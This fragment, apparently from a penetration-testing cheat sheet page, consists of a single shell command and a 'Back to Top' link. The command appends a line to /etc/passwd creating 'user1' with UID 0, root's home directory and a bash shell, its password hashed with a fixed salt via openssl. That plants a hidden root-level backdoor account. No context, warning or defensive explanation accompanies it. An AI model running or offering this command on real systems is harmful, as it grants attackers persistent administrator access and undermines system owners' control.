echo "user1:$(openssl passwd -1 -salt 123 user1):0:0:root:/root:/bin/bash" >> /etc/passwd
 
 
Back to Top